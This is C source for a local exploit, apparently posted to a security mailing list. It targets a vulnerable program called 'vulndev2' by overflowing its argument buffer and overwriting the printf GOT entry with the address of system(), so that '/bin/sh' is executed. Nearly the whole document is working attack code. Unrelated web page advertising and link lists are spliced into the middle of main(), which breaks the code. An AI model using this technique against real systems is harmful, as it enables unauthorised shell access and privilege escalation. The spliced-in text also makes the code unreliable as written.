#include 
#include 
#include 
#include 
#include 

unsigned long systemaddr;
unsigned long printf_got;
extern char **environ;
#define BFSIZE 90
#define CMDSTRING "/bin/sh;"
#define VULN "vulndev2"
long buffer[BFSIZE + 4 + 1];
char *charbuffer =(char *) buffer;
long argv_1[BFSIZE / 4 + 5];


int padding;

int remove_chld_signal()
{
    struct sigaction mysigaction;
    mysigaction.sa_handler = SIG_DFL;
    mysigaction.sa_flags = 0;
    sigemptyset(&mysigaction.sa_mask);
    sigaddset(&mysigaction.sa_mask, SIGCHLD);
    sigaction(SIGCHLD, &mysigaction, NULL);
    return 0;
}
int my_popen(char *command)
{
    char *args[] = { "/bin/sh", "-c", command, NULL };
    int inpipes[2];
    int uid;
    pipe(inpipes);
    uid = fork();
    if (uid == 0) {
	close(inpipes[0]);	/* stdin */
	dup2(inpipes[1], 1);	/* stdout */
	execve("/bin/sh", args, environ);
	fprintf(stderr, "Something went wrong with the execve\n");
	return -1;
    }
    close(inpipes[1]);
    return inpipes[0];
}
long get_gotaddr(char *file, char *symbol)
{
    int fd;
    long got;
    char buffer[256];
    snprintf(buffer, 256, "objdump -R %s | grep -w %s | sort | tail -n 1",
	     file, symbol);
    remove_chld_signal();
    fd = my_popen(buffer);
    if (fd <= 0)
	return -1;
    if (read(fd, buffer, 256) <= 0) {
	printf("short read\n");
	return 0;
    }
    close(fd);
    wait(NULL);
    got = strtoul(buffer, strchr(buffer, ' '), 16);
    return got;
}

int main(int argc, char **argv)
{
    int i;
    int local_var_pad = 5; /* five works at home :) */
    int max;
    int fd;
    unsigned long *target;
    char *args[] ={VULN,(char *)argv_1,"0wn3d",NULL}; 

    if (argc > 1)
	local_var_pad = atoi(argv[1]);

/* getting system addr, updating it and writing stuff into db.log */
    system("");			/* Make the got of system updated */
Do you need help?
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:
Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
    systemaddr = **(unsigned long **) ((char *) system + 2);
    systemaddr++; /* skip the push %ebp instruction */
    strcpy(charbuffer, CMDSTRING);
    printf("Using system address 0x%.8lx\n",systemaddr);
    padding = strlen(charbuffer) + 1;	/* don't forget a null  */
    printf_got = get_gotaddr(VULN, "printf");
    target = (unsigned long *) (charbuffer + padding);
    *target = systemaddr;
    charbuffer[padding+4]='\n';
    charbuffer[padding+5]=0;
    fd=open("./db.log",O_CREAT|O_WRONLY);
    write(fd,charbuffer,padding+5);
    fchmod(fd,0777);
    close(fd);
    
    printf("And overwriting printf got at 0x%.8lx starting by 0x%.8lx\n",
    printf_got,printf_got-padding);
    printf_got -= padding;
    max=BFSIZE/4 + local_var_pad; 
    for (i = 0; i < max; i ++)
	argv_1[i] = 0xbadc0de;
    argv_1[i++] = printf_got;
    argv_1[i++] = 0xf00;

    execve(VULN, args, environ);
    printf("It fucked\n");
    return 0;
}